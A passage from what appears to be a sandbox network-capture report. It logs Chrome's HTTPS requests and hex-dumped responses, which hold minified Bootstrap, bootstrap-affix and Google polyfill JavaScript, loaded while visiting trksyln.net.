2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 65 72 28 64 29 3b 64 3c 30 26 26 28 64 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 65 2b 64 29 29 3b 66 6f 72 28 63 3d 4e 75 6d 62 65 72 28 63 7c 7c 30 29 3b 63 3c 64 3b 63 2b 2b 29 74 68 69 73 5b 63 5d 3d 62 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 29 3b 76 61 72 20 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 7d 3b 70 28 22 49 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e 74 31 36 41 72 72 61 Data Ascii: er(d);d<0&&(d=Math.max(0,e+d));for(c=Number(c\|\|0);c<d;c++)this[c]=b;return this}});var ta=function(a){return a?a:Array.prototype.fill};p("Int8Array.prototype.fill",ta);p("Uint8Array.prototype.fill",ta);p("Uint8ClampedArray.prototype.fill",ta);p("Int16Arra
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 41 61 3f 21 21 5f 2e 42 61 26 26 5f 2e 42 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 3b 0a 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 61 28 29 3f 43 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 44 61 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 44 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 45 61 28 29 3f 30 3a 5f 2e 44 61 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 44 61 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 48 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 72 72 Data Ascii: =function(){return _.Aa?!!_.Ba&&_.Ba.brands.length>0:!1};Ga=function(){return Ea()?Ca("Chromium"):(_.Da("Chrome")\|\|_.Da("CriOS"))&&!(Ea()?0:_.Da("Edge"))\|\|_.Da("Silk")};_.Ia=function(a){return Ha&&a!=null&&a instanceof Uint8Array};La=function(){var a=Err
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 6f 6e 28 61 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 3f 61 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 77 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 75 62 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 6e 65 77 20 76 62 28 5b 5d 2c 7b 7d 29 3b 75 62 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 63 61 74 2e 63 61 6c 6c 28 5b 5d 2c 62 29 2e 6c 65 6e 67 74 68 3d 3d 3d 31 7d 75 62 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65 26 26 28 61 5b 53 79 6d 62 Data Ascii: on(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};wb=function(a){if(ub===void 0){var b=new vb([],{});ub=Array.prototype.concat.call([],b).length===1}ub&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49806	151.101.193.229	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:28 UTC	388	OUT	GET /npm/bootstrap-affix@1.0.1/assets/js/affix.min.js HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:29 UTC	773	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2754 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: application/javascript; charset=utf-8 X-JSD-Version: 1.0.1 X-JSD-Version-Type: version ETag: W/"ac2-OwtoaIo59xCfoKcJqLdO5pCpf00" Accept-Ranges: bytes Date: Thu, 31 Oct 2024 18:19:29 GMT Age: 658739 X-Served-By: cache-fra-eddf8230032-FRA, cache-dfw-kdal2120097-DFW X-Cache: MISS, HIT Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 2f 2a 2a 0a 20 2a 20 4d 69 6e 69 66 69 65 64 20 62 79 20 6a 73 44 65 6c 69 76 72 20 75 73 69 6e 67 20 54 65 72 73 65 72 20 76 35 2e 31 39 2e 32 2e 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 20 66 69 6c 65 3a 20 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 61 66 66 69 78 40 31 2e 30 2e 31 2f 61 73 73 65 74 73 2f 6a 73 2f 61 66 66 69 78 2e 6a 73 0a 20 2a 0a 20 2a 20 44 6f 20 4e 4f 54 20 75 73 65 20 53 52 49 20 77 69 74 68 20 64 79 6e 61 6d 69 63 61 6c 6c 79 20 67 65 6e 65 72 61 74 65 64 20 66 69 6c 65 73 21 20 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 73 64 65 6c 69 76 72 2e 63 6f 6d 2f 75 73 69 6e 67 2d 73 72 69 2d 77 69 74 68 2d 64 79 6e 61 6d 69 63 2d 66 69 6c 65 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 Data Ascii: /** * Minified by jsDelivr using Terser v5.19.2. * Original file: /npm/bootstrap-affix@1.0.1/assets/js/affix.js * * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files */!function(
2024-10-31 18:19:29 UTC	1376	IN	Data Raw: 73 2e 24 74 61 72 67 65 74 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 65 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 69 6e 6e 65 64 4f 66 66 73 65 74 3d 65 2e 74 6f 70 2d 74 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 57 69 74 68 45 76 65 6e 74 4c 6f 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 74 2e 70 72 6f 78 79 28 74 68 69 73 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 2c 74 68 69 73 29 2c 31 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 29 7b 76 61 72 20 65 3d Data Ascii: s.$target.scrollTop(),e=this.$element.offset();return this.pinnedOffset=e.top-t},i.prototype.checkPositionWithEventLoop=function(){setTimeout(t.proxy(this.checkPosition,this),1)},i.prototype.checkPosition=function(){if(this.$element.is(":visible")){var e=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49807	151.101.193.229	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:28 UTC	391	OUT	GET /npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:29 UTC	773	IN	HTTP/1.1 200 OK Connection: close Content-Length: 78743 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: application/javascript; charset=utf-8 X-JSD-Version: 5.0.2 X-JSD-Version-Type: version ETag: W/"13397-kBFpUnUH/55mLPZNjjYfNZMIlw0" Accept-Ranges: bytes Date: Thu, 31 Oct 2024 18:19:29 GMT Age: 4258 X-Served-By: cache-fra-eddf8230080-FRA, cache-dfw-kdfw8210168-DFW X-Cache: HIT, HIT Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 Data Ascii: /! Bootstrap v5.0.2 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 5b 31 5d 29 2c 65 3d 69 26 26 22 23 22 21 3d 3d 69 3f 69 2e 74 72 69 6d 28 29 3a 6e 75 6c 6c 7d 72 65 74 75 72 6e 20 65 7d 2c 6e 3d 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 69 28 74 29 3b 72 65 74 75 72 6e 20 65 26 26 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 2c 73 3d 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 69 28 74 29 3b 72 65 74 75 72 6e 20 65 3f 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3a 6e 75 6c 6c 7d 2c 6f 3d 74 3d 3e 7b 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 29 7d 2c 72 3d 74 3d 3e 21 28 21 74 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 29 26 26 28 76 6f 69 64 20 30 Data Ascii: [1]),e=i&&"#"!==i?i.trim():null}return e},n=t=>{const e=i(t);return e&&document.querySelector(e)?e:null},s=t=>{const e=i(t);return e?document.querySelector(e):null},o=t=>{t.dispatchEvent(new Event("transitionend"))},r=t=>!(!t\|\|"object"!=typeof t)&&(void 0
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 70 28 29 3b 69 66 28 65 29 7b 63 6f 6e 73 74 20 69 3d 74 2e 4e 41 4d 45 2c 6e 3d 65 2e 66 6e 5b 69 5d 3b 65 2e 66 6e 5b 69 5d 3d 74 2e 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 65 2e 66 6e 5b 69 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 74 2c 65 2e 66 6e 5b 69 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 28 29 3d 3e 28 65 2e 66 6e 5b 69 5d 3d 6e 2c 74 2e 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 29 7d 7d 2c 22 6c 6f 61 64 69 6e 67 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 28 6d 2e 6c 65 6e 67 74 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 28 29 3d 3e 7b 6d 2e 66 6f 72 45 61 63 68 28 74 3d 3e 74 28 29 29 7d 29 2c 6d 2e 70 75 Data Ascii: p();if(e){const i=t.NAME,n=e.fn[i];e.fn[i]=t.jQueryInterface,e.fn[i].Constructor=t,e.fn[i].noConflict=()=>(e.fn[i]=n,t.jQueryInterface)}},"loading"===document.readyState?(m.length\|\|document.addEventListener("DOMContentLoaded",()=>{m.forEach(t=>t())}),m.pu
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 67 65 73 74 75 72 65 73 74 61 72 74 22 2c 22 67 65 73 74 75 72 65 63 68 61 6e 67 65 22 2c 22 67 65 73 74 75 72 65 65 6e 64 22 2c 22 66 6f 63 75 73 22 2c 22 62 6c 75 72 22 2c 22 63 68 61 6e 67 65 22 2c 22 72 65 73 65 74 22 2c 22 73 65 6c 65 63 74 22 2c 22 73 75 62 6d 69 74 22 2c 22 66 6f 63 75 73 69 6e 22 2c 22 66 6f 63 75 73 6f 75 74 22 2c 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 62 65 66 6f 72 65 75 6e 6c 6f 61 64 22 2c 22 72 65 73 69 7a 65 22 2c 22 6d 6f 76 65 22 2c 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 22 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 22 65 72 72 6f 72 22 2c 22 61 62 6f 72 74 22 2c 22 73 63 72 6f 6c 6c 22 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 26 26 60 24 7b Data Ascii: gesturestart","gesturechange","gestureend","focus","blur","change","reset","select","submit","focusin","focusout","load","unload","beforeunload","resize","move","DOMContentLoaded","readystatechange","error","abort","scroll"]);function x(t,e){return e&&`${
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 2c 75 2e 6f 72 69 67 69 6e 61 6c 48 61 6e 64 6c 65 72 3d 72 2c 75 2e 6f 6e 65 4f 66 66 3d 73 2c 75 2e 75 69 64 45 76 65 6e 74 3d 64 2c 63 5b 64 5d 3d 75 2c 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 61 2c 75 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 74 2c 65 2c 69 2c 6e 2c 73 29 7b 63 6f 6e 73 74 20 6f 3d 53 28 65 5b 69 5d 2c 6e 2c 73 29 3b 6f 26 26 28 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 69 2c 6f 2c 42 6f 6f 6c 65 61 6e 28 73 29 29 2c 64 65 6c 65 74 65 20 65 5b 69 5d 5b 6f 2e 75 69 64 45 76 65 6e 74 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 2e 72 65 70 6c 61 63 65 28 45 2c 22 22 29 2c 43 5b 74 5d 7c 7c 74 7d 63 6f 6e 73 74 20 50 3d 7b 6f 6e 28 74 2c 65 2c 69 2c 6e 29 7b Data Ascii: ,u.originalHandler=r,u.oneOff=s,u.uidEvent=d,c[d]=u,t.addEventListener(a,u,o)}function j(t,e,i,n,s){const o=S(e[i],n,s);o&&(t.removeEventListener(i,o,Boolean(s)),delete e[i][o.uidEvent])}function M(t){return t=t.replace(E,""),C[t]\|\|t}const P={on(t,e,i,n){
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 52 3d 7b 73 65 74 28 74 2c 65 2c 69 29 7b 48 2e 68 61 73 28 74 29 7c 7c 48 2e 73 65 74 28 74 2c 6e 65 77 20 4d 61 70 29 3b 63 6f 6e 73 74 20 6e 3d 48 2e 67 65 74 28 74 29 3b 6e 2e 68 61 73 28 65 29 7c 7c 30 3d 3d 3d 6e 2e 73 69 7a 65 3f 6e 2e 73 65 74 28 65 2c 69 29 3a 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 60 42 6f 6f 74 73 74 72 61 70 20 64 6f 65 73 6e 27 74 20 61 6c 6c 6f 77 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 65 20 69 6e 73 74 61 6e 63 65 20 70 65 72 20 65 6c 65 6d 65 6e 74 2e 20 42 6f 75 6e 64 20 69 6e 73 74 61 6e 63 65 3a 20 24 7b 41 72 72 61 79 2e 66 72 6f 6d 28 6e 2e 6b 65 79 73 28 29 29 5b 30 5d 7d 2e 60 29 7d 2c 67 65 74 3a 28 74 2c 65 29 3d 3e 48 2e 68 61 73 28 74 29 26 26 48 2e 67 65 74 28 74 29 2e 67 65 74 28 65 29 7c 7c 6e 75 6c 6c 2c Data Ascii: R={set(t,e,i){H.has(t)\|\|H.set(t,new Map);const n=H.get(t);n.has(e)\|\|0===n.size?n.set(e,i):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(n.keys())[0]}.`)},get:(t,e)=>H.has(t)&&H.get(t).get(e)\|\|null,
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 6f 6e 73 74 20 65 3d 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 66 61 64 65 22 29 3b 74 68 69 73 2e 5f 71 75 65 75 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 2c 74 2c 65 29 7d 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 7b 74 2e 72 65 6d 6f 76 65 28 29 2c 50 2e 74 72 69 67 67 65 72 28 74 2c 22 63 6c 6f 73 65 64 2e 62 73 2e 61 6c 65 72 74 22 29 7d 73 74 61 74 69 63 20 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 57 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 68 69 73 29 3b 22 63 6c 6f 73 65 22 3d 3d 3d 74 26 26 65 Data Ascii: onst e=t.classList.contains("fade");this._queueCallback(()=>this._destroyElement(t),t,e)}_destroyElement(t){t.remove(),P.trigger(t,"closed.bs.alert")}static jQueryInterface(t){return this.each((function(){const e=W.getOrCreateInstance(this);"close"===t&&e
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 2e 6c 65 6e 67 74 68 29 2c 65 5b 6e 5d 3d 7a 28 74 2e 64 61 74 61 73 65 74 5b 69 5d 29 7d 29 2c 65 7d 2c 67 65 74 44 61 74 61 41 74 74 72 69 62 75 74 65 3a 28 74 2c 65 29 3d 3e 7a 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 73 2d 22 2b 24 28 65 29 29 29 2c 6f 66 66 73 65 74 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 65 2e 74 6f 70 2b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 2c 6c 65 66 74 3a 65 2e 6c 65 66 74 2b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 4c 65 66 74 7d 7d 2c 70 6f 73 69 74 69 6f 6e 3a 74 3d 3e 28 7b 74 6f 70 3a 74 2e 6f 66 66 73 65 74 54 6f 70 2c 6c 65 66 74 3a 74 2e Data Ascii: .length),e[n]=z(t.dataset[i])}),e},getDataAttribute:(t,e)=>z(t.getAttribute("data-bs-"+$(e))),offset(t){const e=t.getBoundingClientRect();return{top:e.top+document.body.scrollTop,left:e.left+document.body.scrollLeft}},position:t=>({top:t.offsetTop,left:t.
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 26 26 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 75 70 64 61 74 65 49 6e 74 65 72 76 61 6c 28 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 Data Ascii: t\|\|(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config&&this._config.interval&&!this._isPaused&&(this._updateInterval(),this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).b
2024-10-31 18:19:29 UTC	1378	IN	Data Raw: 58 29 3a 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 74 2e 63 6c 69 65 6e 74 58 7d 2c 69 3d 74 3d 3e 7b 74 68 69 73 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 74 2e 74 6f 75 63 68 65 73 26 26 74 2e 74 6f 75 63 68 65 73 2e 6c 65 6e 67 74 68 3e 31 3f 30 3a 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 2d 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 7d 2c 6e 3d 74 3d 3e 7b 21 74 68 69 73 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 7c 7c 22 70 65 6e 22 21 3d 3d 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 26 26 22 74 6f 75 63 68 22 21 3d 3d 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 74 2e 63 6c 69 65 6e 74 58 2d 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 29 2c 74 68 69 73 2e 5f 68 61 6e Data Ascii: X):this.touchStartX=t.clientX},i=t=>{this.touchDeltaX=t.touches&&t.touches.length>1?0:t.touches[0].clientX-this.touchStartX},n=t=>{!this._pointerEvent\|\|"pen"!==t.pointerType&&"touch"!==t.pointerType\|\|(this.touchDeltaX=t.clientX-this.touchStartX),this._han

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49798	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:29 UTC	997	OUT	GET /f/AGSKWxV0ZPylImy9Jv559Xp-MfnxImaXclZ9OIKioUncC-GjReRDOsqaZURJYln7HbKIHyw60n2CPZC7wftExCVvpG55gIUpCQASPLV6D5xkeZKDyuznFxUsEyU7ddDqW8yK_JFWTVcJHA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzY3LDE4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:29 UTC	1936	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:29 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: cross-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-MQclucNoioUB25L8M1vnSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw0ZBikPj6kkkLiJ3SZ7CGAHHrzXOs04E46d951hIgdte6yOoPxIYKl1idgdix6BKrJxCr9lxiNQfi--susT4H4iKJK6wtQHy76QrrYyBm-HqFlQOIhbg5Nk7p38km8ODzOw8ljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAVJU_7Q" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
